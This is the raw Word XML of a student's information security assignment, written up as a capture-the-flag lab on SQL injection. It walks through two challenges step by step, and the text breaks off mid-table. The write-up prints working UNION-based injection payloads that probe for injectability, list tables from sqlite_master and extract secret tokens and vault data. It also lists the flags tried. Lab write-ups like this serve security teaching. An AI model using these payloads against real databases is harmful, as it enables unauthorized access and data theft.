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B8F82" w14:textId="357B73B2" w:rsidR="00455D3B" w:rsidRPr="0035023A" w:rsidRDefault="0035023A" w:rsidP="0035023A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035023A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Security A-03 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0CBEF" w14:textId="7DB54468" w:rsidR="0035023A" w:rsidRPr="0035023A" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035023A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tauha Imran 22i-1239 cs-g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F0DEA" w14:textId="77777777" w:rsidR="0035023A" w:rsidRDefault="0035023A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91498189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2B06415" w14:textId="65F5BFC2" w:rsidR="0035023A" w:rsidRDefault="0035023A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0D0D07AA" w14:textId="40458371" w:rsidR="0035023A" w:rsidRDefault="0035023A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67870" w:history="1">
            <w:r w:rsidRPr="00581377">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>01 SQL Injection - Basic Exploit a basic SQL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C4B13" w14:textId="45D05FBD" w:rsidR="0035023A" w:rsidRDefault="0035023A">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5E183C96" w14:textId="104C91EC" w:rsidR="0035023A" w:rsidRDefault="0035023A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486D390" w14:textId="77777777" w:rsidR="0035023A" w:rsidRDefault="0035023A"/>
    <w:p w14:paraId="68AD0839" w14:textId="77777777" w:rsidR="0035023A" w:rsidRDefault="0035023A" w:rsidP="0035023A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc214867870"/>
      <w:r w:rsidRPr="00455D3B">
        <w:t>01 SQL Injection - Basic Exploit a basic SQL Query</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5C8EADC3" w14:textId="77777777" w:rsidR="0035023A" w:rsidRDefault="0035023A"/>
    <w:p w14:paraId="34B8319B" w14:textId="603453FF" w:rsidR="00455D3B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:t xml:space="preserve">Testing basic </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>query ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> got basic table and user information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06C783" w14:textId="2B088AD9" w:rsidR="0035023A" w:rsidRDefault="0035023A">
      <w:r>
        <w:t>query: %</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A1A55" w14:textId="77777777" w:rsidR="0063785B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39909861" wp14:editId="66CACC8E">
            <wp:extent cx="5411349" cy="3040083"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="81299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423" cy="305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54538" w14:textId="6E3FC63A" w:rsidR="0063785B" w:rsidRDefault="00C93184">
      <w:r>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidR="0063785B">
        <w:t xml:space="preserve">uery: </w:t>
      </w:r>
      <w:r w:rsidR="0063785B" w:rsidRPr="0063785B">
        <w:t>%' UNION SELECT 1,2,3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F57B43" w14:textId="2B4A6731" w:rsidR="0063785B" w:rsidRDefault="0063785B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60659F1C" wp14:editId="19016D4C">
            <wp:extent cx="5403273" cy="3035547"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="199828195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8195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683" cy="3048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4CF28" w14:textId="5BDD9D93" w:rsidR="0063785B" w:rsidRDefault="0063785B"/>
    <w:p w14:paraId="2C700691" w14:textId="431D5E41" w:rsidR="00455D3B" w:rsidRDefault="00455D3B"/>
    <w:p w14:paraId="47B6C28C" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:t>This way I can tell that this is injectable because results are showing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED0E5B" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555736AB" wp14:editId="6B438991">
            <wp:extent cx="5284519" cy="2968831"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="18821544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639" cy="2970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D61F8" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRDefault="00455D3B"/>
    <w:p w14:paraId="6F2B0640" w14:textId="164DF816" w:rsidR="00455D3B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:t>Getting all the table names to find the flag</w:t>
      </w:r>
      <w:r w:rsidR="00D71DC9">
        <w:br/>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidR="00A5156B">
        <w:t xml:space="preserve">uery: </w:t>
      </w:r>
      <w:r w:rsidR="00587E9F">
        <w:t>%’</w:t>
      </w:r>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00A5156B">
        <w:t xml:space="preserve"> UNION SELECT name,1,1 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00A5156B">
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00A5156B">
        <w:t xml:space="preserve"> WHERE type='table' --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="128E2D00" wp14:editId="50173EFA">
            <wp:extent cx="5260769" cy="2955488"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11108941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185" cy="2963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DF18" w14:textId="769FCB34" w:rsidR="00FE1B27" w:rsidRDefault="00FE1B27">
      <w:r>
        <w:t xml:space="preserve">And I found </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a ”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>player</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D911683" w14:textId="654E63D4" w:rsidR="00FE1B27" w:rsidRDefault="00FE1B27">
      <w:r w:rsidRPr="00FE1B27">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B58A0B9" wp14:editId="64316A2F">
            <wp:extent cx="5943600" cy="1235710"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="14631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6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8431" w14:textId="77777777" w:rsidR="002B23A0" w:rsidRDefault="002B23A0"/>
    <w:p w14:paraId="55656DA4" w14:textId="45C75A94" w:rsidR="002B23A0" w:rsidRDefault="002B23A0">
      <w:r>
        <w:t>Getting data from that “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>player_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” table</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">query: </w:t>
      </w:r>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00BF6FA1">
        <w:t xml:space="preserve">%'UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00BF6FA1">
        <w:t>secret_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00BF6FA1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00BF6FA1">
        <w:t>reward_points</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00BF6FA1">
        <w:t xml:space="preserve">, 0 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00BF6FA1">
        <w:t>player_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A49F4">
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69353865" w14:textId="6D3B489F" w:rsidR="006A49F4" w:rsidRDefault="006A49F4">
      <w:r w:rsidRPr="006A49F4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289DBC68" wp14:editId="0227579A">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74542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29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Found the flags now submitting and seeing which one works!</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9037" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172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7"/>
        <w:gridCol w:w="1840"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="006A49F4" w14:paraId="23BF79ED" w14:textId="77777777" w:rsidTr="006A49F4">
        <w:trPr>
          <w:trHeight w:val="763"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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1A4279E" w14:textId="72893769" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r>
              <w:t>Flags Found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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190BBD3" w14:textId="78B4369E" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r>
              <w:t>Correct?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="006A49F4" w14:paraId="10E7501D" w14:textId="77777777" w:rsidTr="006A49F4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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7402CB3" w14:textId="423B77CA" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r w:rsidRPr="006A49F4">
              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006A49F4">
              <w:t>This_is_not_the_flag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006A49F4">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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3FFB8AE" w14:textId="6563AD84" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="006A49F4" w14:paraId="2118C2B7" w14:textId="77777777" w:rsidTr="006A49F4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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3B5387E" w14:textId="77777777" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r w:rsidRPr="006A49F4">
              <w:t>FLAG{Trust_me_its_false_1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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A44E083" w14:textId="78753C80" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="006A49F4" w14:paraId="03CA993E" w14:textId="77777777" w:rsidTr="006A49F4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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DF29B61" w14:textId="77777777" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r w:rsidRPr="006A49F4">
              <w:t>FLAG{Trust_me_its_ture_1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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F3FBB37" w14:textId="5527E6E3" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="006A49F4" w14:paraId="694F8F3E" w14:textId="77777777" w:rsidTr="006A49F4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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E658ECE" w14:textId="77777777" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r w:rsidRPr="006A49F4">
              <w:t>FLAG{Trust_me_its_false_2}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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9243FE9" w14:textId="5491C7DE" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="006A49F4" w14:paraId="753468B6" w14:textId="77777777" w:rsidTr="006A49F4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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C373509" w14:textId="77777777" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r w:rsidRPr="006A49F4">
              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006A49F4">
              <w:t>Hello_world_to_SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006A49F4">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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CFA693E" w14:textId="77777777" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r w:rsidRPr="006A49F4">
              <w:t>999</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="006A49F4" w14:paraId="18B39259" w14:textId="77777777" w:rsidTr="006A49F4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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6A1F2BE" w14:textId="77777777" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r w:rsidRPr="006A49F4">
              <w:lastRenderedPageBreak/>
              <w:t>FLAG{Trust_me_its_ture_2}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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DEA6121" w14:textId="493167A2" w:rsidR="006A49F4" w:rsidRPr="006A49F4" w:rsidRDefault="006A49F4" w:rsidP="006A49F4">
            <w:r>
              <w:t>YESSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CDD5865" w14:textId="77777777" w:rsidR="006A49F4" w:rsidRDefault="006A49F4"/>
    <w:p w14:paraId="460A8206" w14:textId="4A9361FD" w:rsidR="006A49F4" w:rsidRDefault="006A49F4">
      <w:r w:rsidRPr="006A49F4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1323071F" wp14:editId="15C4DDCE">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22061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13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4BD8" w14:textId="77777777" w:rsidR="005C338D" w:rsidRDefault="005C338D"/>
    <w:p w14:paraId="63005493" w14:textId="1EB97308" w:rsidR="005C338D" w:rsidRDefault="005C338D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5701EC6F" w14:textId="4D8F2E88" w:rsidR="005C338D" w:rsidRDefault="005C338D" w:rsidP="00C3324B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00455D3B">
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00C3324B">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00455D3B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C338D">
        <w:t xml:space="preserve">SQL Injection </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005C338D">
        <w:t xml:space="preserve"> Advance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00455D3B">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00C3324B">
        <w:t>Exploit a bit advanced SQL</w:t>
      </w:r>
      <w:r w:rsidR="00C3324B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C3324B">
        <w:t>Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA3F77" w14:textId="784349F5" w:rsidR="00C3324B" w:rsidRDefault="00C3324B" w:rsidP="00C3324B"/>
    <w:p w14:paraId="383E9BF5" w14:textId="7341CD1A" w:rsidR="00C3324B" w:rsidRPr="00C3324B" w:rsidRDefault="00C3324B" w:rsidP="00C3324B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Starting of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with a basic query to see what we can find</w:t>
      </w:r>
      <w:r w:rsidR="00453893">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>query: %</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7EB566" w14:textId="3692C6FA" w:rsidR="005C338D" w:rsidRDefault="00453893">
      <w:r w:rsidRPr="00C3324B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E83EBC" wp14:editId="63BB8AEF">
            <wp:extent cx="5197642" cy="2926450"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="114590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02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0285" cy="292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565D" w14:textId="77777777" w:rsidR="00453893" w:rsidRDefault="00453893"/>
    <w:p w14:paraId="34F9DBEC" w14:textId="4BE32557" w:rsidR="00C3324B" w:rsidRDefault="00C3324B">
      <w:r>
        <w:t>now further exploring the columns</w:t>
      </w:r>
      <w:r w:rsidR="00453893">
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">query: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3324B">
        <w:t>%' UNION SELECT 'a','b',1,'c' ORDER by budget --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF7548" w14:textId="155360FD" w:rsidR="00C3324B" w:rsidRDefault="00C3324B">
      <w:r w:rsidRPr="00C3324B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ABC84BB" wp14:editId="51611172">
            <wp:extent cx="5094514" cy="2864030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85372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217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9978" cy="287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141B" w14:textId="382EB918" w:rsidR="00E06A21" w:rsidRDefault="00E06A21">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now getting the table names</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">query:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E06A21">
        <w:t xml:space="preserve">%' UNION SELECT name, 'x', 1, 'x' FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E06A21">
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E06A21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B22E4E">
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC4D07" w14:textId="18393CC2" w:rsidR="00B22E4E" w:rsidRDefault="00B22E4E">
      <w:r>
        <w:t>Found a table named “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B22E4E">
        <w:t>client_vault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>” ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I think</w:t>
      </w:r>
      <w:r w:rsidR="009A3845">
        <w:t xml:space="preserve"> the flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> might be there </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756FDD45" w14:textId="781FACAD" w:rsidR="00E06A21" w:rsidRDefault="00E06A21">
      <w:r w:rsidRPr="00E06A21">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72306EAB" wp14:editId="1BAC5AF7">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22194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47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675F" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRDefault="00496AB3"/>
    <w:p w14:paraId="6CB6BE9E" w14:textId="51453753" w:rsidR="00496AB3" w:rsidRDefault="00496AB3">
      <w:r>
        <w:t>And using the hints got this from “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client_vault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” table by accessing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encrypted_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292273CE" w14:textId="3C0C6E4A" w:rsidR="00496AB3" w:rsidRDefault="00496AB3">
      <w:r>
        <w:t xml:space="preserve">query: </w:t>
      </w:r>
      <w:r w:rsidRPr="00496AB3">
        <w:t xml:space="preserve">%' UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496AB3">
        <w:t>encrypted_data,'b','c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496AB3">
        <w:t xml:space="preserve">' FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496AB3">
        <w:t>client_vault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B4AA33" w14:textId="78E468F4" w:rsidR="00496AB3" w:rsidRDefault="00496AB3">
      <w:r w:rsidRPr="00496AB3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9B42F6" wp14:editId="4DFB0F81">
            <wp:extent cx="5498275" cy="3098066"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="142775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568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1085" cy="309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FB56" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRDefault="00496AB3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F172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0"/>
        <w:gridCol w:w="3634"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00496AB3" w14:paraId="10D39EF8" w14:textId="6332B326" w:rsidTr="00B55082">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FF5E65D" w14:textId="3646FDCB" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496AB3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Flags Found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B0F9E09" w14:textId="5C7088CF" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB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CORRECT?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00496AB3" w14:paraId="4E1E2882" w14:textId="112E81F5" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73819AD7" w14:textId="200DAC52" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r w:rsidRPr="00496AB3">
              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00496AB3">
              <w:t>Keep_looking_elsewhere</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00496AB3">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="403C60CE" w14:textId="72CFED67" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00496AB3" w14:paraId="1F16A491" w14:textId="675A9FA4" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50002FA8" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r w:rsidRPr="00496AB3">
              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00496AB3">
              <w:t>Not_the_real_flag_here</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00496AB3">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AAB4A7F" w14:textId="5BC01419" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00496AB3" w14:paraId="074C2331" w14:textId="38559D8A" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AA92878" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r w:rsidRPr="00496AB3">
